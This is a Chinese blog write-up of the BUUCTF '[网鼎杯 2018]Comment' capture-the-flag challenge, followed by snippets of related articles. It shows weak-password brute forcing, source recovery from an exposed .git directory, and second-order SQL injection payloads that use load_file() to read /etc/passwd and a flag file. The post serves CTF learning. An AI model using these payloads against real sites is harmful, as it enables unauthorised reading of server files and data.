BUUCTF之[网鼎杯 2018]Comment

最新推荐文章于 2024-08-05 18:55:11 发布
最新推荐文章于 2024-08-05 18:55:11 发布
阅读量985 收藏 2
点赞数
分类专栏: BUUCTF 文章标签: git php 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62107966/article/details/126880872
版权

题目链接:BUUCTF在线评测

考点:二次注入,git源码泄露,addslashes函数绕过

首先发帖的时候必须登录,爆破弱密码登录,得到666是满足的后三位密码的。是一个类似留言板的界面,考虑二次注入,并且有git源码泄露

用githck工具下载源码:

安装此工具并开始利用获取源码

https://github.com/wangyihang/githacker

git clone https://github.com/wangyihang/githacker
python GitHack.py --url http://633e13bc-587b-4e68-9cc6-2489ec00cdc5.node4.buuoj.cn/.git/

得到write_do.php

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

没啥用,应该是代码缺失了,使用命令git log --all恢复文件,得到完整源代码:

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

分析如下:

addslashes()对预定义字符进行转义,例如 ‘ “ \ NULL,给其加上/,放到数据库后会把转义符 \ 去掉,并存入数据库中。

sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";

对于category(发帖页面),在category中放入payload,存入数据库的值从数据库取出来后并没有进行转义,所以在cmment中,也就是留言页面,刚刚取出来的值直接用sql insert插入语句来跟cmment里的语句拼接构成二次注入。

构造如下,在

输入:

1',content=database(),/*

然后在:

 输入:*/# sql语句是换行的,所以我们无法用单行注释符,必须用/**/拼接,用#闭合sql语句使其执行。可以看到执行成功,返回ctf这个库。

接下来尝试sql语句注入都失败了,看了大佬的wp,用sql来读取文件。模板:select load_file(‘文件绝对路径’)。

接下来的构造如下:

查看用户:

1',content=(select (load_file('/etc/passwd'))),/*

查看隐藏文件:

a', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

得到:

 

HEX转字符 十六进制转字符 hex gb2312 gbk utf8 汉字内码转换 - The X 在线工具

 转为字符串

接着访问:

1',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

拿去解密,得到flag:

16进制转换,16进制转换文本字符串,在线16进制转换 | 在线工具

flag{49f6d797-63b1-48bc-b492-37dcb3343adf}

 

 

泪涌@
关注
专栏目录
[Python从零到壹] 五.网络爬虫之BeautifulSoup基础语法万字详解
杨秀璋的专栏
11-08 1万+
欢迎大家来到“Python从零到壹”,在这里我将分享约200篇Python系列文章,带大家一起去学习和玩耍,看看Python这个有趣的世界。所有文章都将结合案例、代码和作者的经验讲解,真心想把自己近十年的编程经验分享给大家,希望对您有所帮助,文章中不足之处也请海涵。Python系列整体框架包括基础语法10篇、网络爬虫30篇、可视化分析10篇、机器学习20篇、大数据分析20篇、图像识别30篇、人工智能40篇、Python安全20篇、其他技巧10篇。您的关注、点赞和转发就是对秀璋最大的支持,知识无价人有情,希望
新手学Python之学习官网教程(三: An Informal Introduction to Python)
热门推荐
herosunly的博客
04-26 1万+
文章目录1. 前言2. Python的正式介绍 1. 前言   好几节课过去,终于可以开始吃正餐了,也就是要开始学习Python的基本语法内容了。      之前课程已经讲过了Jupyter Notebook的使用方法。按理来说,直接使用Jupyter Notebook学习基础语法更方便快捷,但是考虑再三,为了让大家学的更加扎实,更推荐先使用Python解释器的交互模式进行练习。有余力的同学,建议在Jupyter Notebook中再练习一遍。   Python解释器的交互模式,我们再来学习一下:代码和
[网鼎杯 2018]Comment
夜幕下的灯火阑珊的博客
05-13 929
主页面是一个留言板 要想发帖得先登录 爆破一下密码,为zhangwei666,登录即可发帖 扫描到后台有.git文件泄露,但是下载下来的源码不齐全 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); ...
二次注入(2018网鼎杯comment
最新发布
qq_64395221的博客
08-05 788
先进入/tmp目录,解压缩了html.zip文件(得到/tmp/html),之后将html.zip删除了,拷贝了一份html给了/var/www目录(得到/var/www/html),之后将/var/www/html下的.DS_Store文件删除,但是/tmp/html下的.DS_Store文件没有删除,查看一下,然后因为这种文件直接读取通常存在乱码,所以要转进制读取才行。/*是php的注释符,将后边的引号注释掉。在评论区提交*/#,/**/形成闭合后,将content注释掉了,同时也绕过了引号。
buu-[网鼎杯 2018]Comment
qaq517384的博客
10-13 317
进入题目 发帖时提示要登录,密码用bp跑出来是666 然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出 稍微试了一下,有问题的都发不出留言 在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露 githack载下来的源码跟没载一样 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./l
pgsql之Comment命令
深海微澜
11-01 5040
参考 Comment命令:定义或者改变一个对象的评注 语法: COMMENT ON { TABLE object_name | COLUMN table_name.column_name | AGGREGATE agg_name (agg_type [, ...] ) | CAST (sourcetype AS targettype) | CONSTRAINT cons...
[AFCTF2018]你听过一次一密么?
2er0!=O的博客
07-23 2637
[AFCTF2018]你听过一次一密么? 附件: Problem.txt 25030206463d3d393131555f7f1d061d4052111a19544e2e5d 0f020606150f203f307f5c0a7f24070747130e16545000035d 1203075429152a7020365c167f390f1013170b1006481e1314 0f4610170e1e2235787f7853372c0f065752111b15454e0e09 081543000e1e6
[网鼎杯 2018]Comment题解,超详细!
2202_75361164的博客
10-23 663
【代码】[网鼎杯 2018]Comment题解,超详细!思路加payload
[BUUCTF] 网鼎杯 comment
Dannie01的博客
10-15 482
如标题所见,评论区触发 1.弱密码爆破 2.git源码泄露+恢复 git log --reflog git reset --hard 第一个版本ID 拿到完整源码 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET['do'])){ switch ($_GET['do'
[网鼎杯 2018]Comment(二次注入,git泄露,git恢复)
qq_45521281的博客
04-12 3231
进入题目是这样的 要发帖还必须登录 在这里已经给了你用户名并提示了密码;密码隐藏了后三位,我们可以用爆破爆破后面三位的方法: 由爆破状态码的密码后三位为666,登录进去就可以发帖了。接下来用dirsearch扫描,发现存在.git文件 那应该存在.git文件泄露,用GitHack下载发现有一个write_do.php,但是代码有缺失 查一下之前提交的版本,单独用git log不能全部显示,直...
网鼎杯2018 comment
weixin_44377940的博客
03-20 2284
本次知识点 git恢复文件 二次注入 git恢复文件 如何判断是否可以恢复? 看是否有commit文件,如果没有,则需要恢复,像这题: 可以看到,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值